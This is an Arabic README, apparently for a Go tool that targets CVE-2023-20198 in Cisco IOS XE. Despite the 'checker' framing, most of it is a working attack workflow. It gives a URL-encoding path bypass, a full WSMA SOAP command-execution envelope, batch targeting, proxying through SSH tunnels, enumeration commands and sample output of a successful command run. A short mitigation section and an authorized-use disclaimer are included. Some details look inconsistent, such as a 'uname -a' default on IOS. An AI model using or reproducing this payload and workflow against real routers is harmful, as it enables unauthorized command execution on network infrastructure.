
ماسح ثغرات مبني على Go لاكتشاف CVE-2023-20198 في أجهزة Cisco IOS XE. يختبر واجهات SOAP/XML (WSMA) لتنفيذ تعليمات برمجية عن بُعد مع فحص دفعات وإنشاء تقارير HTML.
ماسح ضوئي احترافي للثغرات الأمنية لكشف CVE-2023-20198 في أجهزة Cisco IOS XE. يختبر واجهات SOAP/XML الضعيفة (WSMA). صُمم لتقييمات الأمان المصرح بها وتدقيق الشبكات.
لاختبار الأمان المصرح به فقط
هذه الأداة مخصصة حصريًا لما يلي:
الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. تأكد دائمًا من حصولك على التصريح المناسب قبل اختبار أي أنظمة.
go install (مُوصى به)go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest
سيتم تثبيت الملف الثنائي في دليل $GOPATH/bin (عادةً ~/go/bin).
# استنساخ المستودع
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker
# بناء
go build -o cisco-cve-2023-20198-checker
# تثبيت (اختياري)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/
# فحص هدف واحد
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# فحص أهداف متعددة
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin
# إنشاء تقرير HTML
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html
ممتاز للبيئات المؤسسية! يدعم:
# وكيل HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# SOCKS5 (نفق SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# متغير بيئة
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin
انظر PROXY_GUIDE.md للحصول على تفاصيل تكوين الوكيل.
| العلامة | النوع | الافتراضي | الوصف |
|---|---|---|---|
-target | string | - | IP/اسم مضيف الهدف الفردي |
-targets-file | string | - | ملف يحتوي على الأهداف (واحد لكل سطر) |
-port | int | 443 | منفذ HTTPS/SOAP |
-username | string | admin | اسم مستخدم SOAP |
-password | string | - | مطلوب. كلمة مرور SOAP |
-command | string | uname -a | الأمر المراد تنفيذه |
-html | bool | false | إنشاء تقرير HTML |
-timeout | int | 10 | مهلة الطلب (بالثواني) |
-skip-verify | bool | true | تخطي التحقق من SSL |
-proxy | string | - | رابط الوكيل (http://، https://، socks5://) |
# فحص الثغرة الأساسي
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# منفذ مخصص
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret
# تنفيذ أمر محدد
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# إنشاء تقرير
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html
# إنشاء ملف الأهداف
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF
# اختبار جميع الأهداف
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123
# دفعة مع تقرير HTML
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html
# تعداد الشبكة
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show ip interface brief"
# كشف الإصدار
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# عبر وكيل HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# عبر وكيل SOCKS5 (نفق SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# وكيل موثق
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://user:[email protected]:8080
معرف CVE: CVE-2023-20198
درجة CVSS: 10.0 (حرجة)
النوع: تنفيذ أكواد عن بُعد (RCE)
المتأثر: واجهة Web UI من Cisco IOS XE (WSMA)
/%2577ebui_wsma_https (تجاوز ترميز المسار)urn:cisco:wsma-exec<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP:Header>
<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
<wsse:UsernameToken>
<wsse:Username>admin</wsse:Username>
<wsse:Password>password</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</SOAP:Header>
<SOAP:Body>
<request xmlns="urn:cisco:wsma-exec">
<execCLI>
<cmd>COMMAND_HERE</cmd>
</execCLI>
</request>
</SOAP:Body>
</SOAP:Envelope>
إذا كانت أجهزتك معرضة للخطر:
1. تعطيل WSMA (إن لم يكن مطلوبًا)
no ip http server
no ip http secure-server
2. تقييد الوصول باستخدام قوائم التحكم بالوصول (ACLs)
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
permit 10.0.0.0 0.0.0.255
deny any log
3. تحديث البرامج الثابتة - تطبيق أحدث تصحيحات الأمان من Cisco
4. تفعيل المصادقة القوية
aaa new-model
aaa authentication login default group tacacs+ local
5. مراقبة السجلات - مراقبة النشاط المشبوه لـ SOAP/HTTP
# بناء قياسي
go build -o cisco-cve-2023-20198-checker
# مُحسّن (ملف ثنائي أصغر)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker
# ترجمة متقاطعة لمنصات مختلفة
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1
╔═══════════════════════════════════════════════════════════╗
║ فحص أمان SOAP/XML من Cisco ║
║ تقييم أمان تعليمي ومصرح به فقط ║
╚═══════════════════════════════════════════════════════════╝
[*] الأمر: show version
[*] المنفذ: 443
[*] المهلة: 10 ثوانٍ
[1/1] اختبار الهدف: 192.168.1.100:443
[*] جاري إرسال طلب SOAP...
[+] تم تلقي الرد (الحالة: 200)
[+] نجاح!
╔═══════════════════════════════════════════════════════════╗
║ نتائج الدفعة ║
╚═══════════════════════════════════════════════════════════╝
[✓] 192.168.1.100:443 - نجاح
Cisco IOS XE Software, الإصدار 16.09.04...
╔═══════════════════════════════════════════════════════════╗
║ الملخص ║
╚═══════════════════════════════════════════════════════════╝
إجمالي الأهداف: 1
ناجحة: 1
فاشلة: 0